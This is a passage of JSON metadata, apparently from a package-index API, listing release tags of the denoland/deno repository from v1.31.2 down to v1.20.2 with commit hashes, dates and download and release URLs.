a9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v